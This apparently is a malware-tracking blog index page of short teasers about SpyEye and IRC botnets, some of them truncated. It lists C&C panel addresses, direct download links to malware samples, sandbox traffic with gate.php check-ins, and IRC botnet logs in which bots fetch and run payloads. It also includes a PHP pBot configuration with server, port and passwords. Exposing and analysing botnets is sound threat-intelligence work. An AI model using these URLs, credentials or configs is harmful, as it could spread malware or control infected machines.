Spy Eye Panel: http://theimageshare.com/kurac/ Spy Eye Sample: http://89.207.135.198/pas.exe http://adf.ly/1x8Rp just in case first link is removed Websites used to infect people: butterflysolutions.net ??? iserdo need money ? imageshare.cc iserdo.net ???? lol popusi.biz HTTP QueriesHTTP Query Text – 5xf9~x15x10x11x11x11x11x16x15x15x15x15x17x17x17x17x1ax1ax1ax1anx01!U4V:__-H8ty{{juuuux17xx0cS4A(LLx19jx0f}x0fN theimageshare.com GET /kurac/gate.php?guid=User!SANDBOXB!38BA2BE7&ver=10299&stat=ONLINE&ie=6.0.2900.2180&os=5.1.2600&ut=Admin&cpu=100&ccrc=FADB319B&md5=e47f5cbd0ae6d17cbeb5530db3f9779f HTTP/1.1 Windows Api CallsPId Image Name Address Function ( Parameters ) | Return ValueRead more...

ishigo is a poor french lamer he’s known in carding boards Exe File: http://privathosting.be/~ishigo/ptcmd.exe Avira fail detecting this: Nom du fichier Résultat ptcmd.exe FALSE POSITIVE Le fichier ‘ptcmd.exe’ a été classifié comme ‘FALSE POSITIVE’. Cela signifie que ce fichier n’est pas dangereux et qu’il s’agit d’un message erroné de notre part. Le modèle de détectionRead more...

DNS QueriesDNS Query Text www.agriturismoraggiodisole.com IN A + www.agit.com.br IN A + www.ameagaru.fr IN A + HTTP QueriesHTTP Query Text www.agriturismoraggiodisole.com POST /files/filtect.php HTTP/1.0 www.agit.com.br POST /apuracao/filtect.php HTTP/1.0 www.ameagaru.fr POST /memo/filtect.php HTTP/1.0 DNS QueriesDNS Query Text www.allahskanan.net IN A + www.groupe-cogit.com IN A + fercon.ro IN A + demo.ckentgroup.com IN A + HTTP QueriesHTTP QueryRead more...

This guy is heckers from United States of America sk9.no-ip.biz DNS_TYPE_A 76.231.162.14 YES TCP Connection Attempts: 76.231.162.14:3086 EXE Files: http://armoredfist01.fileave.com/manycam.exe http://armoredfist01.fileave.com/ hosting infos: http://whois.domaintools.com/76.231.162.14

Remote Host Port Number 195.239.22.110 4244 NICK [nLh-VNC]phrkbv USER wjkfr “fo3.net” “rage” :wjkfr JOIN #v# sk PRIVMSG #v# : [RAGE SCAN:] range: 89.x.x.x/90 threads. hosting infos: http://whois.domaintools.com/195.239.22.110

Remote Host Port Number 213.251.170.52 80 91.211.117.152 1865 PASS ngrBot NICK n{US|XPa}tqmvmrd USER tqmvmrd 0 0 :tqmvmrd JOIN #main 4m3r1k4 JOIN #clean QUIT :removing hosting infos: http://whois.domaintools.com/91.211.117.152

Remote Host Port Number 174.132.149.187 80 208.79.237.100 80 213.251.170.52 80 92.241.164.155 7654 PASS ngrBot NICK n{US|XPa}sxwscly USER sxwscly 0 0 :sxwscly JOIN #oldgold noKIDs PRIVMSG #oldgold :[d=”http://buenosairesrestaurante.com/js/jquery/plugins/supefish.js.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataWcxaxw.exe” – Download retries: 0 PRIVMSG #oldgold :[DNS]: Blocked 0 domain(s) – Redirected 31 domain(s) hosting infos: http://whois.domaintools.com/92.241.164.155

class pBot { var $config = array(“server”=>”208.115.225.27”, “port”=>”2390”, “pass”=>””, “prefix”=>”BoT”, “maxrand”=>”3”, “chan”=>”#dada”, “chan2″=>”#dada”, “key”=>”123456”, “modes”=>”+p”, “password”=>”123”, “trigger”=>”.”, “hostauth”=>”*” // * for any hostname (remember: /setvhost xdevil.org) ); Clients: I have 162 clients and 0 servers Local users: Current Local Users: 162 Max: 585 Global users: Current Global Users: 162 Max: 477 Joins: [A]BoT824 12[ 15BoT545@rox-E8B5EA1.xrea.com]Read more...

Finally first belgian hecker from Iran Remote Host Port Number 212.123.29.57 8080 NICK IC79467772 USER root 8 * : some name PONG :E1B2C2E5 JOIN #iseee PRIVMSG #iseee :&userid=COMPUTERNAME PONG :ircb.iranserv.com Telenet claim to be one of the best ISP in Belgium and this botnet is hosted in Telenet Network This is more funny: remarks: trouble:Read more...

Remote Host Port Number 213.58.198.106 7107 NICK new[iRooT-XP-USA]694514 USER 4318 “” “TsGh” :4318 JOIN #!MSN! Coded PONG :irc.foonet.com NICK new[iRooT-XP-USA]389985 MODE #!Reklam! PRIVMSG #!Reklam! : OnLine… NICK DeliCocuk USER bruce “mIRC” “kayits.byinter.net” :KendiniBilmeZ JOIN #!Reklam! sikimiye MODE DeliCocuk +i USER 4207 “” “TsGh” :4207 JOIN #!MSN! Coded PRIVMSG #!MSN! :[Download]: Executed Successfully NICK anil USERRead more...